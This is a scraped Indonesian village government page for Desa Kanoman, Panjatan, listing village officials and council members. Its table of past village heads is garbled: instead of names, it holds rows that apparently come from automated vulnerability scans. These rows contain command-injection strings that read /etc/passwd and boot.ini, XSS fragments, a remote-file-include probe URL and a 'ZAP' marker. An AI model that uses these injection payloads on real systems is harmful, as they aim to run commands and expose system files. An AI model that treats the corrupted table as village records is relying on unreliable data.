Desa Kanoman

Beranda / Kecamatan Panjatan / Desa Kanoman

Desa : Kanoman
Kecamatan : Panjatan
Kepala Desa : SUHARTANA

# Nama Jabatan
1. SUPRIH ROHMADI (PJ. LURAH) Lurah
2. RILA REVA YANTI, S.PD. Carik
3. TRIJANTA Panata Laksana Sarta Pangripta
4. SURANTA, S.P Danarta
5. SUJASIN Jagabaya
6. MELINDA KOMALASARI Ulu-ulu
7. TRI YULI ANTORO, S.PD. Kamituwa
8. SUHARTANA Dukuh PEDUKUHAN I
9. SUMIYEM Dukuh PEDUKUHAN II
10. SURAHMAN Dukuh PEDUKUHAN III
11. SUMARDI Dukuh PEDUKUHAN IV
12. CRISTIANTO, S.PD. Dukuh PEDUKUHAN V
13. SUGENG RIYANTO Dukuh Pedukuhan VI

# Nama Jabatan
1. NGADIKUN Ketua
2. LILIS SETIYANINGSIH, S.PD Wakil Ketua
3. RECHY BEKTI RAMADHANI Sekretaris
4. RACHMADI Ketua Bidang Penyelenggaraan Pemerintah Kalurahan
5. SARNA Ketua Bidang Pembangunan Kalurahan dan Pemberdayaa
6. SURYANTINI Anggota
7. SUDARMIYATUN Anggota

# Nama Kepala Desa Awal Masa Jabatan Akhir Masa Jabatan
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65. 123 "> 123
66. 123 "> 123
67. 123 .sys 123
68. 123 .sys 123
69. 123 .sys 123
70. 123 .sys 123
71. 123 123 ">
72. 123 123 ">
73. 123 123 .sys
74. 123 123 .sys
75. 123 123 .sys
76. 123 123 .sys
77. ;system("cat /etc/passwd"). 123 123
78. .system("cat /etc/passwd"). 123 123
79. system("cat /etc/passwd"); 123 123
80. :system("cat /etc/passwd"); 123 123
81. |cat /etc/passwd.dat| 123 123
82. |cat /etc/passwd| 123 123
83. |cat /etc/passwd.htm| 123 123
84. |cat /etc/passwd.html| 123 123
85. |cat /etc/passwd| 123 123
86. |cat /etc/passwd 123 123
87. "> 123 123
88. ;system("cat /etc/passwd") 123 123
89. ;system("cat /etc/passwd"); 123 123
90. ;system("type c:oot.ini"); 123 123
91. :system("type c:oot.ini"). 123 123
92. ;system("type c:oot.ini") 123 123
93. ;system("type c:oot.ini"). 123 123
94. ;type c:oot.ini; 123 123
95. `type c:oot.ini` 123 123
96. `type c:oot.ini`; 123 123
97. http://uniscan.sourceforge.net/c.txt? 123 123
98. 123" 123 123
99. 123 123
100. "> 123 123
101. :system("type c:oot.ini"); 123 123
102. .system("type c:oot.ini"). 123 123
103. `cat /etc/passwd`; 123 123
104. `cat /etc/passwd` 123 123
105. ;system("type c:oot.ini") 123 123
106. :system("cat /etc/passwd"). 123 123
107. ;cat /etc/passwd; 123 123
108. |type c:oot.ini.html| 123 123
109. |type c:oot.ini| 123 123
110. |type c:oot.ini| 123 123
111. |type c:oot.ini.dat| 123 123
112. system("type c:oot.ini"); 123 123
113. |type c:oot.ini.htm| 123 123
114. 123" 123 123
115. |type c:oot.ini.html| 123 123
116. |type c:oot.ini| 123 123
117. `cat /etc/passwd` 123 123
118. ;cat /etc/passwd; 123 123
119. |type c:oot.ini 123 123
120. ;system("cat /etc/passwd") 123 123
121. ;system("cat /etc/passwd"); 123 123
122. :system("cat /etc/passwd"). 123 123
123. :system("cat /etc/passwd"); 123 123
124. ;system("cat /etc/passwd"). 123 123
125. |cat /etc/passwd.dat| 123 123
126. `cat /etc/passwd`; 123 123
127. |type c:oot.ini| 123 123
128. ;type c:oot.ini; 123 123
129. :system("type c:oot.ini"). 123 123
130. `type c:oot.ini` 123 123
131. `type c:oot.ini`; 123 123
132. ;system("type c:oot.ini"); 123 123
133. :system("type c:oot.ini"); 123 123
134. .system("type c:oot.ini"). 123 123
135. |type c:oot.ini.dat| 123 123
136. system("type c:oot.ini"); 123 123
137. |type c:oot.ini.htm| 123 123
138. ;system("type c:oot.ini"). 123 123
139. 123 123
140. |cat /etc/passwd.htm| 123 123
141. |cat /etc/passwd.html| 123 123
142. |cat /etc/passwd 123 123
143. system("cat /etc/passwd"); 123 123
144. |type c:oot.ini 123 123
145. |cat /etc/passwd| 123 123
146. http://uniscan.sourceforge.net/c.txt? 123 123
147. 123" 123 123
148. |cat /etc/passwd| 123 123
149. .system("cat /etc/passwd"). 123 123
150. 123 123 123"
151. 123 123 123"
152. 123 123 123"
153. 123 123 :sys
154. 123 123 :sys
155. 123 123 :sys
156. 123 123 :sys
157. 123 123 :sys
158. 123 123 :sys
159. 123 123 :sys
160. 123 123 :sys
161. 123 123 ;cat
162. 123 123 ;cat
163. 123 123 ;sys
164. 123 123 ;sys
165. 123 123 ;sys
166. 123 123 ;sys
167. 123 123 ;sys
168. 123 123 ;sys
169. 123 123 ;sys
170. 123 123 ;sys
171. 123 123 ;sys
172. 123 123 ;sys
173. 123 123 ;sys
174. 123 123 ;sys
175. 123 123 ;typ
176. 123 123 ;typ
177. 123 123
178. 123 123
179. 123 123 http
180. 123 123 http
181. 123 123 syst
182. 123 123 syst
183. 123 123 syst
184. 123 123 syst
185. 123 123 `cat
186. 123 123 `cat
187. 123 123 `cat
188. 123 123 `cat
189. 123 123 `typ
190. 123 123 `typ
191. 123 123 `typ
192. 123 123 `typ
193. 123 123 |cat
194. 123 123 |cat
195. 123 123 |cat
196. 123 123 |cat
197. 123 123 |cat
198. 123 123 |cat
199. 123 123 |cat
200. 123 123 |cat
201. 123 123 |cat
202. 123 123 |cat
203. 123 123 |cat
204. 123 123 |cat
205. 123 123 |typ
206. 123 123 |typ
207. 123 123 |typ
208. 123 123 |typ
209. 123 123 |typ
210. 123 123 |typ
211. 123 123 |typ
212. 123 123 |typ
213. 123 123 |typ
214. 123 123 |typ
215. 123 123 |typ
216. 123 123 |typ
217. 123 123" 123
218. 123 123" 123
219. 123 123" 123
220. 123 :sys 123
221. 123 :sys 123
222. 123 :sys 123
223. 123 :sys 123
224. 123 :sys 123
225. 123 :sys 123
226. 123 :sys 123
227. 123 :sys 123
228. 123 ;cat 123
229. 123 ;cat 123
230. 123 ;sys 123
231. 123 ;sys 123
232. 123 ;sys 123
233. 123 ;sys 123
234. 123 ;sys 123
235. 123 ;sys 123
236. 123 ;sys 123
237. 123 ;sys 123
238. 123 ;sys 123
239. 123 ;sys 123
240. 123 ;sys 123
241. 123 ;sys 123
242. 123 ;typ 123
243. 123 ;typ 123
244. 123 123
245. 123 123
246. 123 http 123
247. 123 http 123
248. 123 syst 123
249. 123 syst 123
250. 123 syst 123
251. 123 syst 123
252. ZAP ZAP ZAP
253. 123 `cat 123
254. 123 `cat 123
255. 123 `cat 123
256. 123 `cat 123
257. 123 `typ 123
258. 123 `typ 123
259. 123 `typ 123
260. 123 `typ 123
261. 123 |cat 123
262. 123 |cat 123
263. 123 |cat 123
264. 123 |cat 123
265. 123 |cat 123
266. 123 |cat 123
267. 123 |cat 123
268. 123 |cat 123
269. 123 |cat 123
270. 123 |cat 123
271. 123 |cat 123
272. 123 |cat 123
273. 123 |typ 123
274. 123 |typ 123
275. 123 |typ 123
276. 123 |typ 123
277. 123 |typ 123
278. 123 |typ 123
279. 123 |typ 123
280. 123 |typ 123
281. 123 |typ 123
282. 123 |typ 123
283. 123 |typ 123
284. 123 |typ 123